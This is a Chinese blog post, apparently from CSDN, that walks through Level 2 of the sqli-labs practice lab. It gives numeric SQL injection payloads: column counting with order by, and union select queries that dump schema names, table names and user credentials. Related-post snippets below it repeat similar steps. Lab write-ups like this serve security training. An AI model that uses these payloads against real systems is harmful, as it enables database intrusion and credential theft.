sqli-labs系列——第二关

最新推荐文章于 2024-05-20 16:27:21 发布
最新推荐文章于 2024-05-20 16:27:21 发布
阅读量247 收藏 2
点赞数
分类专栏: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51923959/article/details/112667793
版权
本文探讨了一种常见的Web安全问题——SQL注入,通过案例展示了如何利用注入漏洞获取数据库信息,包括数据库名、列名及用户账号密码。利用0x3a字符将账号和密码合并,便于观察。这些攻击手段提醒我们重视SQL安全防护和输入验证。
摘要由CSDN通过智能技术生成

less2

and 1=1有回显,and 1=2无回显,为数值型注入
在这里插入图片描述

order by 4–+报错,有3行

在这里插入图片描述
查询数据库名

?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

在这里插入图片描述

查询列名

?id=0 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述

查询账号密码

?id=0 union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+

在这里插入图片描述

这里因为跟第一关大同小异,字段类型都是一样的,可以直接用exp去爆

exp:?id=-1 union SELECT 1,2,(select group_concat(username,0x3a,password) from users)--+
在这里插入图片描述

这里解释一下0x3a的用途:把账号和密码整合到一起更直观的显示

Drunkmars
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场第二详解
tangtang_888的博客
07-06 1787
1、点击进入sqli-labs-master靶场第二Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
sqli-labs----第二
wyzhxhn的博客
11-05 363
第二
sqli-labs---第二
最新发布
2201_75556700的博客
05-20 295
5、查users表中的字段名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)4、查询表名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)id=1 and 1=2 order by 3# 没有报错。id=1 and 1=2 order by 4# 报错。id=1 显示正常。id=1# 显示正常。id=1' 报错。id=1'# 报错。可以知道这里是数字型注入。1、判断是什么类型注入。
【网安自学/web漏洞-day02】sqli-labs第二(改为跨站注入)
加油~
05-07 285
查询注入点与第一题不一样,其他都一样,所以试一试跨站注入 若一个网页的注入点使用的是root用户,那么可以使用这个注入点跨库查询其他的数据库。 例如:;使用sqil-labs root用户注入进行跨库攻击: 在网站后添加id=1发现显示用户名 判断是否是字符注入 http://127.0.0.1/sqli-labs/Less-2/?id=1’ 根据报错类型判断可能是int类型:http://127.0.0.1/sqli-labs/Less-2/?id=1...
sqli-labs第2
weixin_45626840的博客
04-23 214
直接开始 1、判断注入点 2、判断类型------>有下图可知为数字型 3、判断字段数 4、测试回显列,优先联合注入 5、有回显,优先尝试联合注入 6、接下来查库,查表,查字段,固定套路
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
在这个压缩包中,sqli-labs-php7可能包含一系列精心设计的练习,旨在帮助开发者理解和防御SQL注入攻击。通过这些练习,用户可以学习如何识别SQL注入的迹象,理解它们的工作原理,并掌握防御策略。在实践中,这将提高...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs(php7.3以上可运行)
01-29
二、sqli-labs平台介绍 sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs.rar
12-22
2. SQL注入平台sqli-labs源码:即压缩包内的`sqli-labs`文件夹,包含了各种SQL注入挑战的网页和脚本。 搭建步骤如下: 1. 安装PHPstudy:访问PHPstudy官方网站下载最新版本,根据提示安装到本地计算机上。 2. 启动...
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs练习(第二)——数字型
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1742
1、先判断是字符型还是数字型。 172.16.11.222/sqli-labs/Less-2/?id=1 id=2-1 与 id=1的结果一样,说明是数字型。 2、确认字段位数 172.16.11.222/sqli-labs/Less-2/?id=1 order by 3 一共3位 3、确认占位信息 172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+ 4、找库名 http://172.16.11.222/sqli-labs/Less-
SQLI-labs-第二
weixin_54055099的博客
08-29 353
SQLI第二的思路
新手纪录一下sqlilabs第二
weixin_52780973的博客
07-02 876
sqllib第二
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是于MySQL注入技术的详细指南,特别注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值